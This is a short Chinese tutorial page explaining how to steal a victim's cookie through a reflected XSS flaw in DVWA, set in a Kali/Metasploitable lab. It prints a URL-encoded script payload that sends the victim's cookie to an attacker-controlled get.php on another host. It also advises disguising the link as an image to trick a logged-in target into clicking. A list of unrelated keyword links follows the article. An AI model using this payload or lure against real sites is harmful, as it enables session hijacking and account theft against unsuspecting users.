如何利用XSS漏洞获取对方cookie
发表于:2025-01-21 作者:千家信息网编辑
千家信息网最后更新 2025年01月21日,这篇文章主要讲解了"如何利用XSS漏洞获取对方cookie",文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习"如何利用XSS漏洞获取对方cookie"吧!(
千家信息网最后更新 2025年01月21日如何利用XSS漏洞获取对方cookie
这篇文章主要讲解了"如何利用XSS漏洞获取对方cookie",文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习"如何利用XSS漏洞获取对方cookie"吧!
(1)环境搭建
kali linux:192.168.80.136
目标win7: 192.168.80.130
Metasploitable:192.168.80.129
cookie接收脚本get.php(脚本在/var/www/html文件夹下,html文件夹权限777):
(2)XSS漏洞利用
目标登录metasploitable的DVWA,点击存在XSS漏洞的页面,输入如下代码后提交:
(3)查看cookie
切换到kali,直接查看cookie.txt内容,可以看到获得的cookie。
(4)进一步利用
目标提交后可以在地址栏看到如下URL:
http://192.168.80.129/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F192.168.80.136%2Fget.php%3Fcookie%3D%22%2B[xss_clean]%3B%3C%2Fscript%3E#
可以将以上URL伪装成其他形式(如图片),诱使目标点击,在目标已登录的情况下,可以达到同样获取cookie的效果。
感谢各位的阅读,以上就是"如何利用XSS漏洞获取对方cookie"的内容了,经过本文的学习后,相信大家对如何利用XSS漏洞获取对方cookie这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是,小编将为大家推送更多相关知识点的文章,欢迎关注!
漏洞
目标
对方
内容
学习
情况
文件
文件夹
脚本
登录
代码
图片
地址
就是
形式
思路
效果
文章
更多
权限
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
如何将旧电脑改造成数据库
贵州大数据库安全
巫妖之王服务器
java软件开发工程师应聘
ibm服务器安全操作规程
数据库安全报告
数据库如何查询死锁
邯郸伟创网络技术有限公司
联想服务器远程管理地址
杨浦网络安全分论坛
网络安全6层防护
软件开发组 职责
ae 渲染服务器
搭建全球网络安全
服务器安全设置 十八
在网络安全领域中肉鸡又称为
教学数据库中有学生 课程
国网发布典网络安全告警通报
数据库两个表外键相互连接
sybase数据库是什么
军人网络安全对照检查
免费半年服务器
网络安全主题什么
高青化工软件开发公司
大连慧晨网络技术信息
盗贼之海怎么去同一个服务器
上海有niit软件开发吗
软件开发平台及设计流程图
外网数据库的安全
labview对数据库的修改